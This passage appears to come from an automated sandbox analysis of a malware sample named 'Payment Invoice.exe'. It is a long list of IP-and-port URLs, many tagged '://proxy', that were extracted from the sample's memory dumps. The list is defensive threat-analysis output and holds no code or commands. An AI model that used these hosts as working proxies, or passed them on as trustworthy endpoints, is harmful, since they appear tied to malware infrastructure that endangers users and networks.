                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.159.6.163:1994://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163171AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.215.87.194:6022
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.215.87.194:6022://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.215.87.194:6034
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.215.87.194:6034://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.215.87.194:8893
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.215.87.194:8893://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.219.96.12:52017
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.219.96.12:52017://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.224.225.26:42648
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.224.225.26:42648://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.233.25.83:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.233.25.83:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.235.184.9:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.235.184.9:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.235.184.9:4153X
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.24.9.114:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.24.9.114:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.248.87.172:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.248.87.172:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.105:31337
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.105:31337://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.249:31337
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.249:31337://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.41:31337
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.41:31337://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.73:31337
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.251.255.73:31337://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.3.155.25:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.3.155.25:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631967C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.96.101.75:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.96.101.75:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.96.15.70:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.96.15.70:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.97.109.83:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.97.109.83:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.97.236.242:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.97.236.242:56780q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.97.236.242:5678://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.102.238.49:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.102.238.49:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163186EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.122.105
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163186DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.122.105.181:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163186EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.122.105.181:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.141.184.235:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.141.184.235:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.191.53.155:7497
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.191.53.155:7497://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.210.136.88:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.210.136.88:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.228.145.138:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.228.145.138:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.49.191.14:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.49.191.14:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.63.9.62:63253
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.63.9.62:63253://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.171
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.171://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.171:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.37
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.37://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.37:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.120.248.106:7497
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.120.248.106:7497://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.124.15.13:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.124.15.13:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.221.163:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.221.163:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.167:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.167:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B40000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.171:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.171:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.194:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.38:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.38:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.3:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.3:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317199000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163172A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.40:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163171E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.40:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.5:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.5:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.7:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.7:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.133.155.215:1256
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.133.155.215:1256://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.136.164.140:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.136.164.140:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.163.170.130:41209
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.163.170.130:41209://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.213.106
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.213.106://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.213.106:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.252
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.252.198:2853
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.252.198:2853://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.17.18:8881
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.231.51:7497
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.231.51:7497://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.30.17:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.30.17:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.56.246
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.56.246://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.56.246:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.168.24.222:81
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.168.24.222:81://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.255.244.9:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.255.244.9:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.255.245.205:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.255.245.205:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.255.245.205:1080x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.34.164.99:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.34.164.99:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.40.44.95
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.40.44.95://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.40.44.95:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.56.223.85:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.56.223.85:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.173.223.225:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.173.223.225:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.203.201.146:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.203.201.146:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.163:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.163:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.164:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.164:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.166:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.166:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.168:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.171:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.171:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.85.82.38:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.85.82.38:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.29.101:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.29.101:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.104.20.82:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.104.20.82:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.168.196:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.168.196:8080://proxy0q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.168.217:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.168.217:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.10:33633
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.10:33633://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.10:33633p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.110.99.189:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.110.99.189:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.111.209.207:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.111.209.207:3128://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.113.40.202:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.113.40.202:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.113.90.230:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.113.90.230:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.113.90.230:5678p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.114.245.122:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.114.245.122:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.188.114:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.188.114:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.249.18:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.249.18:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316ABD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.241.102
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.241.102://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.241.102:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.225.15:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.225.15:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.144.224.182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.144.224.182:44550
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.144.224.182:44550://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.15.216.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.15.216.237:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.15.216.237:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DD9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.153.121.2:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.153.121.2:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.18.161:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.18.161:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.237.103
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.237.103://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.237.103:80
